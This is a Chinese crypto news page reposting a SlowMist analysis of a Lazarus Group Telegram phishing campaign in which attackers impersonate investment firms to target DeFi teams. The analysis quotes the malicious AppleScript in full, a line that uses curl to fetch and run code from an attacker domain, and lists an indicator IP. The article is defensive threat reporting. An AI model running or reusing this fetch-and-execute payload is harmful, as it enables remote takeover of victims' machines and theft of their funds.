今日运势评分

-1

本月运势

戊寅月

震荡偏多

癸水为财，亥子丑三会水

壬不泱水更难提防
戌不吃犬作怪上床

宜

祭祀,塞穴,结网,破土,谢土,安葬,移柩,除服,成服,馀事勿取

忌

嫁娶,入宅

月相

有明

底部反弹

日冲

Powered by RitMEX

注册/

TRUMP16.02 -1.56%

SUI3.33 -1.98%

TON3.78 2.76%

TRX0.24 2.58%

DOGE0.24 -0.20%

XRP2.55 -1.29%

SOL168.78 -2.69%

BNB653.03 -0.36%

ETH2792.03 2.01%

BTC95580.93 -1.00%

ETH Gas0.91 Gwei

中性

49

首页 深潮精选 Research 项目发现 7x24h︎快讯 最新活动

慢雾：朝鲜黑客 Telegram 定点欺诈攻击分析

2023.12.07 - 445 天前

朝鲜黑客开始冒充知名投资机构，对项目方进行欺诈钓鱼，影响范围较大。

撰文: 23pds@慢雾安全团队

背景

早在 2022 年，慢雾安全团队就通过慢雾 BTI 情报网络发现朝鲜黑客 Lazarus 团伙开启针对加密货币行业的大规模 Telegram 欺诈钓鱼行动，近期朝鲜黑客更是开始冒充知名投资机构，对项目方进行欺诈钓鱼，鉴于影响范围较大，慢雾在此进行分析。

技战法

一、挑选知名投资机构作为冒充对象，然后建立虚假的 Telegram 帐号：

二、寻找知名的 DeFi 项目方作为目标，以要投资他们为名，使用虚假帐号开始实施骗局：

朝鲜黑客会先对目标发起聊天以建立联系，如果项目方看到消息且安全意识不足，就会出现下图的一幕：

朝鲜黑客骗取项目方的信任后便开始约会议，此处有两种攻击手法：

1. 邀请项目方加入如 ***.group-meeting.team 之类的会议，假装询问对方是否有时间安排会面或详谈，并主动提供恶意会议链接。项目方点击链接后会看到地区访问限制，这时朝鲜黑客会接着诱使项目方下载并运行其提供的“修改定位”的恶意脚本。一旦项目方照做，那么他的电脑就会被朝鲜黑客控制，导致资金被盗取。下面是恶意脚本 IP_Request.scpt 的内容：

set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"

set sc to do shell script "curl -L -k""& fix_url &"\""

run script sc

代码解释：

2. 利用 Calendly 会议预定系统的「添加自定义链接」在事件页面的功能，在事件上插入恶意链接发起钓鱼攻击。由于 Calendly 与大多数项目方的日常工作背景很好地融合在一起，因此这些恶意链接不容易引起怀疑，项目方容易无意中点击恶意链接，下载并执行恶意代码，此时朝鲜黑客同样可以获取到项目方系统相关信息或权限。

慢雾安全团队在 2023 年 11 月 30 日也对相关攻击手法做过提醒：

基础 IOC:

IP: 104.168.137.21

Domains:

恶意攻击样例：

总结

鉴于此类诈骗行为仍在持续发生，建议 Web3 用户务必确保在添加好友时通过双重渠道确认对方的真实性，同时对 Telegram 开启双重身份验证（2FA），随时注意交易安全，以免遭受资金损失。

一旦不慎运行相关木马，请第一时间转移相关资金、断网杀毒，同时修改目标电脑上（包括浏览器里记录的）相关账号密码等信息。

欢迎加入深潮TechFlow官方社群

Telegram订阅群：https://t.me/TechFlowDaily
Twitter官方账号：https://x.com/TechFlowPost
Twitter英文账号：https://x.com/DeFlow_Intern

原文链接

添加收藏

分享社交媒体

作者

慢雾科技@SlowMist_Team

相关文章

2024.11.21 - 94 天前

成也用户，败也用户，我们还要在 Telegram 做增长吗？

本文将从 Telegram 近期发展的角度试图分析未来在 Telegram/TON 上做增长的有效路径。

原创 Telegram

2024.11.18 - 97 天前

详解 OpenAD：Telegram 平台上的去中心化广告解决方案，助力客户实现真实增长与商业变现

OpenAD是一个去中心化的广告平台，致力于提供透明环境、精准投放以及拥有即时反馈的广告体验。

OpenAD Telegram

2024.11.11 - 104 天前

深度揭秘：是谁扼杀了 Telegram 小游戏的生机？

Telegram 小程序应用正面临着两个方面的困境：商业化和内容。

Telegram

2024.10.30 - 116 天前

Builder 再出发！锚定 Telegram 生态，OKX Web3 又放大招？

OKX正在通过 OKX Mini 钱包+ OKX Connect 这套组合拳来简化 Web2 用户进入 Telegram Web3 应用的流程，并打通 Telegram 生态与其他公链生态的壁垒，推动更多用户进入 Web3。

OKX Telegram

2024.10.14 - 132 天前

9 月区块链游戏研报：行业回暖，Telegram 游戏引发热潮

一文了解 Telegram 游戏的影响、市场增长和可持续性挑战。

Telegram 游戏

2024.10.03 - 143 天前

Mpeppe 预售突破 300 万美元，推出 Telegram 游戏平台

Mpeppe（MPEPE）推出Telegram集成的新游戏平台，早期参与者将获30%额外奖励。

Mpeppe Telegram

2024.09.20 - 156 天前

深度解读 Telegram Web3 生态之翼：iMe Messenger LIME 长期价值

本文将从项目基础，团队能力、特点解析、估值分析、未来长期价值、Telegram 与 Ton 关系、疑惑点等角度对其价值进行解读。

Telegram

2024.09.09 - 167 天前

HTX Telegram 小程序上线，限时零门槛体验全网首家 C2C 交易小程序，享超多专属福利

HTX Telegram 小程序 - 便捷与安全的结合，Web2丝滑切入Web3。

HTX Telegram

2024.09.03 - 173 天前

回顾 Telegram 兴衰史，法律会成为重塑应用的关键因素吗？

Telegram 庞大的用户基础与 TON 区块链的高扩展性和低交易费用相结合，使其迅速被用户接受。

Telegram

2024.09.02 - 174 天前

Telegram 案的可怕结果：开发者有罪论

尽管这些加密理想可能很珍贵，但执法当局似乎有意划定一条界限，打击有组织犯罪的优先度远高于所谓的加密行业精神。

Telegram

7x24h 快讯︎更多

02月23日 23:00: Pumpfun 前端已删除与 Lazarus 相关的 Meme 币

02月23日 22:21: LBank已首发上线VK Official（KOHLI）

02月23日 22:02: Michael Saylor 再次发布比特币 Tracker 相关信息，或将继续增持BTC

02月23日 21:57: Greeks.live：整体市场情绪保持谨慎看多，密切关注 9.9 万美元关键阻力位

02月23日 21:06: 数据：SUI、OP、ZETA 等代币将于下周迎来大额解锁

02月23日 20:58: Bybit：有欺诈者会冒充 Bybit 员工，社区需保持警惕

02月23日 20:54: Mirana Ventures 于 40 分钟前向 Bybit Deposit 转移了 1 万枚 ETH

02月23日 20:36: 美国卫生与公众服务部部长 RFK. Jr.：我是比特币的坚定支持者

深潮精选更多

: Berachain 上能玩什么？全面了解主网关键应用和收益策略
2025.02.21

: SBF 狱中最新采访：FTX 从来没破产，只是流动性危机
2025.02.21

: 解读 Origin：告别传统 ICO，打破代币发行三难困境
2025.02.21

: 加密早报：Canary 的 LTC ETF 已在 DTCC 网站列出，以太坊基金会招聘社交媒体经理
2025.02.21

: 解读 Virtuals 推出的新协议 ACP：让 AI Agent 之间可信交易与协作，赛道乏力时的新机会
2025.02.20

TechFlow Selected深潮精选

慢雾：朝鲜黑客 Telegram 定点欺诈攻击分析

朝鲜黑客开始冒充知名投资机构，对项目方进行欺诈钓鱼，影响范围较大。

2023.12.07 Telegram

专注Web3行业深度报道，洞察潮水流动的方向

我要投稿

Hainan Chaodong Technology Co., Ltd. 联系我们 / support@techflowpost.com 琼ICP备2022009338号

FOLLOW US

扫码关注公众号